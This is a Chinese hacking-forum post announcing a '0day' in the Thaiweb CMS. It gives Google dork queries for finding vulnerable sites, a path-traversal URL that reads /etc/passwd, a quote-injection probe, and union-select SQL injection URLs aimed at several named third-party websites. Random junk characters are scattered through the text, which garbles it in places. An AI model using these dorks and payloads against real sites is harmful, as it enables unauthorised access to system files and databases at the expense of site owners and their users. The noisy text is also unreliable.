找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2629|回复: 0
打印 上一主题 下一主题

Thaiweb远程文件sql注入漏洞0day

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-27 08:38:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Google之:
# {3 O* U. Y2 j/ B/ q. g
2 j! `* s& U6 l& O: p9 G) m2 Lintext:powered by Thaiweb2 B. h. q$ I( t& \& r0 _

: ]0 c$ y" o: G8 j6 Ninurl:index.php?page=board.php2 T! h6 _# _5 p# j. W1 r/ ^. ?
( Z  @+ x/ r! I' o: m
4 G6 }3 }/ u$ |: j6 R$ g, b8 q; i- F

) Q2 v, k+ E; z% s- `1 @7 F' R利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd5 k- Z4 I1 }! o5 l

6 O$ u9 N$ O7 i& f * w) I# b2 Z; b6 ]# o% `3 K; ?
* k+ {- S% k! X% n8 ]
利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
1 z7 J4 z, z* r4 O, T
; p' m0 r! ~- \3 q( V7 M3 a$ }
. ~3 t! g6 Z' R! \; Z5 W/ `$ S3 Q
http://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
- W1 |# P$ O$ o7 \. ?, `; }& A
9 Y! D. b+ R$ S8 h) v# G& f# Chttp://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--$ h9 ?  j1 x1 F

3 Q! W; |* g3 l% hhttp://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--7 q7 F7 w. S) d: f9 J7 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表